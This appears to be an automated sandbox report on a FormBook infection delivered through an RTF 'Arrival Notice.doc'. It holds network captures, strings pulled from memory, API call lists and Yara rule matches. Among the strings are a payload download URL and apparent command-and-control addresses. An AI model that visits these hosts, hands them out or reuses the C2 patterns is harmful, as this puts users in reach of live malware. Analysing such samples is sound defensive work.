Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 03 May 2024 09:34:45 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 03 May 2024 09:34:48 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 09:35:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeServer: ApacheContent-Encoding: gzipData Raw: 32 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 51 74 f1 77 0e 89 0c 70 55 c8 28 c9 cd b1 e3 02 00 00 00 ff ff 0d 0a Data Ascii: 20QtwpU(
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 09:35:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeServer: ApacheContent-Encoding: gzipData Raw: 32 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 51 74 f1 77 0e 89 0c 70 55 c8 28 c9 cd b1 e3 02 00 00 00 ff ff 0d 0a Data Ascii: 20QtwpU(
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 09:35:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeServer: ApacheContent-Encoding: gzipData Raw: 32 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 51 74 f1 77 0e 89 0c 70 55 c8 28 c9 cd b1 e3 02 00 00 00 ff ff 0d 0a Data Ascii: 20QtwpU(
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 09:35:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeServer: ApacheAccept-Ranges: bytesData Raw: 32 37 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 0a 0a 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 64 61 74 61 2f 74 65 6d 70 6c 61 74 65 73 2f 77 65 62 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 43 4c 49 45 4e 54 20 45 52 52 4f 52 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 4e 4f 54 20 46 4f 55 4e 44 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 20 3c 62 3e 2f 6e 72 75 70 2f 3c 2f 62 3e 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 27e<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Error 404</title><link href="/data/templates/web/static/style.css" rel="stylesheet"> </head><body><div class="error-container"><div class="error-text"><h1>CLIENT ERROR</h1></div><div class="error-text-strong"><h1>404</h1></div><div class="error-text"><h1>NOT FOUND</h1></div></div><div class="error-descr-container"> <p>The request <b>/nrup/</b> was not found on this server.</p></div> </body></html>

Source: CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 0000000A.00000002.841981166.00000000034B8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com
Source: finger.exe, 00000008.00000003.438784233.0000000005D5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: finger.exe, 00000008.00000003.438784233.0000000005D5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: EQNEDT32.EXE, 00000002.00000002.345073188.0000000000667000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000002.00000002.345073188.0000000000667000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000002.00000002.345073188.0000000000667000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000002.00000002.345073188.0000000000667000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000002.00000002.345073188.0000000000667000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.345073188.0000000000667000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.345073188.0000000000667000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: finger.exe, 00000008.00000003.438784233.0000000005D5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: finger.exe, 00000008.00000003.438784233.0000000005D5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: finger.exe, 00000008.00000003.438784233.0000000005D5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: finger.exe, 00000008.00000003.438784233.0000000005D5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: finger.exe, 00000008.00000003.438784233.0000000005D5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0B
Source: finger.exe, 00000008.00000002.841615616.0000000003914000.00000004.10000000.00040000.00000000.sdmp, CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 0000000A.00000002.841981166.0000000003E24000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://fedoraproject.org/
Source: finger.exe, 00000008.00000002.841615616.0000000003914000.00000004.10000000.00040000.00000000.sdmp, CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 0000000A.00000002.841981166.0000000003E24000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://nginx.net/
Source: EQNEDT32.EXE, 00000002.00000002.345073188.0000000000667000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000002.00000002.345073188.0000000000667000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000002.00000002.345073188.0000000000667000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000002.00000002.345073188.0000000000667000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000002.00000002.345073188.0000000000667000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: finger.exe, 00000008.00000003.438784233.0000000005D5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: finger.exe, 00000008.00000003.438784233.0000000005D5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: EQNEDT32.EXE, 00000002.00000002.345073188.0000000000667000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000002.00000002.345073188.0000000000667000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: finger.exe, 00000008.00000003.438784233.0000000005D5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: finger.exe, 00000008.00000003.438784233.0000000005D5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: finger.exe, 00000008.00000003.438784233.0000000005D5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: finger.exe, 00000008.00000003.438784233.0000000005D5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: EQNEDT32.EXE, 00000002.00000002.345073188.0000000000667000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000002.00000002.345073188.0000000000667000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: finger.exe, 00000008.00000003.438784233.0000000005D5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.com0
Source: finger.exe, 00000008.00000002.841615616.0000000003DCA000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.841987796.0000000005090000.00000004.00000800.00020000.00000000.sdmp, CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 0000000A.00000002.841981166.00000000042DA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.northeastcol0r.com/px.js?ch=1
Source: finger.exe, 00000008.00000002.841615616.0000000003DCA000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.841987796.0000000005090000.00000004.00000800.00020000.00000000.sdmp, CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 0000000A.00000002.841981166.00000000042DA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.northeastcol0r.com/px.js?ch=2
Source: finger.exe, 00000008.00000002.841615616.0000000003DCA000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.841987796.0000000005090000.00000004.00000800.00020000.00000000.sdmp, CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 0000000A.00000002.841981166.00000000042DA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.northeastcol0r.com/sk-logabpstatus.php?a=dUZzc3lpUllpUk5kaWtzQW1IYjlWcnkvMTR6NmV1Y24rZ0Zx
Source: CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 0000000A.00000002.841509438.00000000005B3000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.rtp7winbet.one
Source: CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 0000000A.00000002.841509438.00000000005B3000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.rtp7winbet.one/nrup/
Source: finger.exe, 00000008.00000002.841615616.000000000313A000.00000004.10000000.00040000.00000000.sdmp, CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 0000000A.00000002.841981166.000000000364A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.searchvity.com/
Source: finger.exe, 00000008.00000002.841615616.000000000313A000.00000004.10000000.00040000.00000000.sdmp, CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 0000000A.00000002.841981166.000000000364A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.searchvity.com/?dn=
Source: finger.exe, 00000008.00000002.842461764.0000000061EA8000.00000008.00000001.01000000.00000008.sdmp, sqlite3.dll.8.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: finger.exe, 00000008.00000003.438445982.0000000005D6D000.00000004.00000020.00020000.00000000.sdmp, -e04230_.8.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: finger.exe, 00000008.00000003.438445982.0000000005D6D000.00000004.00000020.00020000.00000000.sdmp, -e04230_.8.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.345073188.0000000000630000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.345073188.00000000005E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://covid19help.top/BE.exe
Source: EQNEDT32.EXE, 00000002.00000002.345073188.0000000000630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://covid19help.top/BE.exeC:
Source: EQNEDT32.EXE, 00000002.00000002.345073188.00000000005E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://covid19help.top/BE.exee
Source: EQNEDT32.EXE, 00000002.00000002.345073188.00000000005EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://covid19help.top/BE.exeggC:
Source: EQNEDT32.EXE, 00000002.00000002.345073188.00000000005EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://covid19help.top/BE.exej
Source: EQNEDT32.EXE, 00000002.00000002.345073188.000000000061C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://covid19help.top/Ha
Source: EQNEDT32.EXE, 00000002.00000002.345073188.000000000061C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://covid19help.top/t
Source: firefox.exe, 0000000E.00000002.457692397.0000000000F20000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: finger.exe, 00000008.00000003.438445982.0000000005D6D000.00000004.00000020.00020000.00000000.sdmp, -e04230_.8.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: finger.exe, 00000008.00000003.438445982.0000000005D6D000.00000004.00000020.00020000.00000000.sdmp, -e04230_.8.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: finger.exe, 00000008.00000003.438445982.0000000005D6D000.00000004.00000020.00020000.00000000.sdmp, -e04230_.8.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: finger.exe, 00000008.00000003.438445982.0000000005D6D000.00000004.00000020.00020000.00000000.sdmp, -e04230_.8.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: finger.exe, 00000008.00000003.438445982.0000000005D6D000.00000004.00000020.00020000.00000000.sdmp, -e04230_.8.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EQNEDT32.EXE, 00000002.00000002.345073188.0000000000667000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: finger.exe, 00000008.00000003.438784233.0000000005D5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: -e04230_.8.dr	String found in binary or memory: https://www.google.com/favicon.ico

Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163

Source: unknown

HTTPS traffic detected: 172.67.175.222:443 -> 192.168.2.22:49163 version: TLS 1.2

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Code function: 5_2_0132EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

5_2_0132EAFF

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Code function: 5_2_0132ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

5_2_0132ED6A

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

5_2_0132EAFF

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Code function: 5_2_0131AB9C GetKeyState,GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

5_2_0131AB9C

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Code function: 5_2_01349576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

5_2_01349576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 6.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.382596136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.382533799.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.457614450.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.841509438.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.841357530.0000000000280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.841245837.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.383628126.0000000001F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.841406060.0000000003C70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.841337285.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: Arrival Notice.doc, type: SAMPLE	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: 6.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.382596136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.382533799.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
